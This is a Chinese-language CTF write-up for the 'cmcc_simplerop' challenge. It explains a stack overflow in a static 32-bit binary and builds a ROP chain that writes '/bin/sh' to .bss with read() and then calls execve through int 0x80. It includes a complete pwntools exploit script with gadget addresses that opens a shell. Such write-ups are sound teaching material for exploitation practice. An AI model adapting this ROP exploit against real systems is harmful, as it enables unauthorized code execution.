cmcc_simplerop
使用checksec
查看:
嗯,只开了栈不可执行,题目已经提示是漏洞是栈溢出了。
直接放进IDA中查看:
很简洁,直接在主函数中给出了栈溢出的地方。
接着查看了该程序的字符串,发现这是一个静态编译的程序,而且不存在flag
、/bin/sh
等关键字符串。
看来是不能直接getshell。但是可以发现存在int 80
,这么一来,可以执行系统调用了。
接下来就是我们需要找一些通用的可以给寄存器赋值的命令。
so…因为系统调用,需要我们执行这样的命令:int80(11,"/bin/sh",null,null)
所以上面的两条命令刚刚好。
接下来就是要解决/bin/sh
的问题,这道题目没有给出字符串,需要我们自己输入,这道题没有开启pie,可以考虑用read()
将/bin/sh
写入到bss段中。
这里还有个坑,IDA中给出的距离ebp的地址是0x14
,打了好几次发现不行,用gdb调试了下才发现距离是0x1c
payload = b'M'*(0x1c+4) + p32(read_addr) + p32(pop_pop_edx_ecx_ebx) + p32(0) + p32(binsh_addr) + p32(0x8)
payload += p32(pop_eax) + p32(0xb) + p32(pop_edx_ecx_ebx) + p32(0) + p32(0) + p32(binsh_addr) + p32(int_addr)
第一段payload是将/bin/sh
写入BSS段,read函数的返回地址用三个pop代替,整好将read函数的三个参数弹出栈,这样就可以执行下面的系统调用了。
第二段就是正常的执行系统调用。
exp:
from pwn import *
#start
r = process("../buu/cmcc_simplerop")
# r = remote("node4.buuoj.cn",27434)
elf = ELF("../buu/cmcc_simplerop")
#params
int_80 = 0x80493e1
pop_eax = 0x80bae06
read_addr = 0x0806CD50
binsh_addr = 0x080EB584
pop_edx_ecx_ebx = 0x0806e850
payload = b'M'*(0x1c+4) + p32(read_addr) + p32(pop_edx_ecx_ebx) + p32(0) + p32(binsh_addr) + p32(0x8) + p32(pop_eax) + p32(0xb) + p32(pop_edx_ecx_ebx) + p32(0) + p32(0) + p32(binsh_addr) + p32(int_80)
#attack
r.sendline(payload)
r.sendline('/bin/sh\x00')
r.interactive()